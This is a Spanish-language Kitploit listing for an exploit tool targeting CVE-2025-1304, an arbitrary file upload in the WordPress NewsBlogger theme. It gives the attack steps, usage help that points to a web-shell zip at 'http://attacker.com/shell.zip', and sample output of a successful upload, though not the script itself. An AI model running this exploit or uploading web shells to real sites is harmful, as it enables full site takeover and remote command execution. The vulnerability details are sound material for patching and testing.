Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-1304 — El tema NewsBlogger de WordPress <= 0.2.5.1 es vulnerable a Subida Arbitraria de Archivos | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-1304
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-1304

CVE-2025-1304

El tema NewsBlogger de WordPress <= 0.2.5.1 es vulnerable a Subida Arbitraria de Archivos

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 Tema NewsBlogger de WordPress <= 0.2.5.1 - Subida Arbitraria de Archivos (CVE-2025-1304)

Puntuación CVSS: 8.8 (Alta)
Tipo de vulnerabilidad: Subida Arbitraria de Archivos
Componente: Tema de WordPress
ID de CVE: CVE-2025-1304


🔥 Resumen de la vulnerabilidad

El tema NewsBlogger de WordPress (versiones <= 0.2.5.1) es vulnerable a una subida arbitraria de archivos a través del panel de bienvenida del administrador.

Esta vulnerabilidad permite a cualquier usuario autenticado — incluidos aquellos con el rol mínimo de Suscriptor — subir un archivo .zip malicioso que contenga un web shell.
La subida se produce a través de un campo de URL de plugin sin validar, que no consigue verificar adecuadamente el contenido o el tipo del archivo subido.

Un ataque exitoso podría conducir al compromiso total del sitio web, incluida la ejecución remota de comandos y la escalada de privilegios.


🧠 Detalles del script

Este script de Python automatiza la explotación de la vulnerabilidad mediante:

  • Iniciar sesión utilizando las credenciales de administrador proporcionadas.
  • Extraer dinámicamente el nonce de la página de bienvenida vulnerable.
  • Subir un plugin malicioso remoto a través del endpoint AJAX vulnerable.

⚙️ Instrucciones de uso

root@kitploit:~
python CVE-2025-1304.py -h
root@kitploit:~
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB

WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )

options:
  -h, --help                show this help message and exit
  --url, -u URL             Target base URL (e.g., http://target/wordpress)
  --username, -un USERNAME WordPress admin username
  --password, -p PASSWORD   WordPress admin password
  --shellweb, -shell SHELLWEB
                           Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)

📤 Ejemplo de salida

root@kitploit:~
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}

⚠️ Aviso legal

Este código se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
El autor no asume ninguna responsabilidad por el mal uso o los daños causados por esta herramienta.


Por: Nxploited ( Khaled Alenazi )

Descargar herramienta